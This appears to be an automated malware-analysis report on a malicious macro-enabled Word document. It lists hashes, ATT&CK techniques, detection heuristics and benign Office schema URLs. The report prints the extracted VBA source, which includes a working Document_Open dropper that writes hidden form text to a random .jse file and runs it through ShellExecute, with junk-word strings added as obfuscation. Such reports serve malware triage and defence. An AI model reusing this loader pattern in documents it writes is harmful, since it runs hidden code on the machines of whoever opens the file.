Office (OOXML) malware analysis — malicious · 247f53e85c6bdd9a

MALICIOUS

Office (OOXML)

90.3 KB Created: 2019-10-27 18:57:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24

MD5: 892fa5de902995f51edb4118b4856630 SHA-1: da2bc3e12bb08ed4f797cad40e549dfcd3ecc169 SHA-256: 247f53e85c6bdd9ac9fefcb83ec999bdc4285fd8f11a5aff8da6a6e6a19dc3e9

218 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a macro-enabled Word document containing obfuscated VBA code. The `Document_Open` macro is present and triggers the execution of this code, which utilizes `CreateObject` and appears to be designed to download and execute a second-stage payload. The presence of `CreateObject` and the obfuscated nature of the auto-exec loader strongly suggest malicious intent.

Heuristics 8

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17))
Dim NN65bU As String
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17))
Dim NN65bU As String

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Load Collect
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Dim folderP As String
folderP = Environ(Collect.Where)
folderP = folderP & "\" & Rnd
```
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5584 bytes
SHA-256: `eb4ff09653e995856f14d8177ff8bb144870b89501e1e4fe41f869414d163c31`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub SearchForBorders1() Dim k As Word.Paragraph Dim bFound As Boolean For Each k In ActiveDocument.Paragraphs bFound = False If k.Borders(wdBorderTop).LineStyle <> wdLineStyleNone _ Then bFound = True If k.Borders(wdBorderLeft).LineStyle <> wdLineStyleNone _ Then bFound = True If k.Borders(wdBorderBottom).LineStyle <> wdLineStyleNone _ Then bFound = True If k.Borders(wdBorderRight).LineStyle <> wdLineStyleNone _ Then bFound = True Dim lXR3G75N As Long lXR3G75N = 4997713 Dim N7M66689Ca As Long N7M66689Ca = 41726 Dim ojL5B As Long If bFound Then k.Range.Select Exit Sub End If Next k End Sub Private Sub Document_Open() Load Collect Dim someStr As String someStr = Collect.HowName.Text Dim rs58jMs95K3 As String rs58jMs95K3 = "very each winter climate completely pleasure till want flower gravity waste catch heart usual stepped figure event wherever safety them act worse here also tone ourselves song giant solve active beauty missing him wrote finally knowledge feathers actually dropped liquid magic fifty unknown clean principal second those stepped arrangement poetry grew become gate down coal person result mysterious string consider scale becoming likely except blind sum pass rain ocean wear thy member milk border personal flight hide individual planet expression provide lake hollow happen position being captured learn chemical thought exchange recognize plane shore duty running ask pay term piece climb order trail step orbit present action dear zulu sick corner except immediately quick regular" Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17)) Dim NN65bU As String NN65bU = "unhappy length adventure jar war grain loud idea properly suddenly military snake naturally deeply transportation supply mix idea second explanation student ago married further through difficulty possibly kept meal aid safe feet pictured kept tax lonely terrible sleep iron scene hurry bag imagine early myself concerned empty worker wish one ought valley vapor hair cream shore copper mix value breathe better refused tiny happened complex very grandfather composition plant sport mile divide leader want clear enter muscle secret visit vote mud struggle western shinning cent chain due pan story who uncle forest front limited class bean fifty subject scene pipe beneath closer level eight quick flight upon than never according rising" tryToRun.ShellExecute (someStr) Set tryToRun = Nothing End Sub Sub SearchForBorders2() Static a As Long, l As Long Dim b As Boolean Dim bd As Border Dim bds As Borders Dim prg As Paragraph Dim prgs As Paragraphs Dim re As Range Dim se As Selection Dim doc As Word.Document ojL5B = 71135 Dim Pl2RJWEbY63l As Long Pl2RJWEbY63l = 454 Dim tAi9bmTOgWNo As Long tAi9bmTOgWNo = 2967 Set se = Selection Set re = se.Range Set doc = ActiveDocument If se.Start < l Then a = se.Start With doc.Content Set bds = .Borders re.Start = a re.End = .End End With For Each bd In bds b = bd = True If b Then Exit For Next If Not b Then Exit Sub Set prgs = re.Paragraphs For Each prg In prgs Set re = prg.Range If InStr(re.Text, Chr(13)) = 0 Then re.End = re.End + 1 End If Set bds = re.Borders For Each bd In bds b = bd = True If b Then Exit For Next If b Then a = re.Start se.Start = re.Start se.End = re.Start a = re.End l = se.Start Exit Sub End If Next a = 0 MsgBox "No more borders found" End Sub Sub TransposeParagraphs() Selection.MoveUp Unit:=wdParagraph, _ Count:=1, Extend:=wdExtend Selection.MoveLeft Unit:=wdCharacter, Count:=1 Selection.MoveDown Unit:=wdParagraph, _ Count:=1, Extend:=wdExtend Selection.Range.Cut Selection.MoveDown Unit:=wdParagraph, Count:=1 Selection.Range.Paste End Sub Attribute VB_Name = "NewMacros" Sub d() End Sub Attribute VB_Name = "Collect" Attribute VB_Base = "0{09A65737-1974-4A42-9D02-BEE352E0B45B}{1195DADB-125B-4FEF-9AA6-683FB293A7E2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Initialize() Randomize Dim strData As String strData = Data.DataText.Caption Dim folderP As String folderP = Environ(Collect.Where) folderP = folderP & "\" & Rnd folderP = folderP & ".jse" Collect.HowName.Text = folderP Open folderP For Output As #5 Print #5, strData Close #5 End Sub Attribute VB_Name = "Data" Attribute VB_Base = "0{7DA87B00-2474-4B41-822B-B4FEED49323A}{5438B97E-06D6-4A75-8A07-F7811BE6010C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	60928 bytes
SHA-256: `c1cea542cbac4ac4e62afe9755b84b1cbe06dd9a8ed8fb90592d45e6cad95043`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 5 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.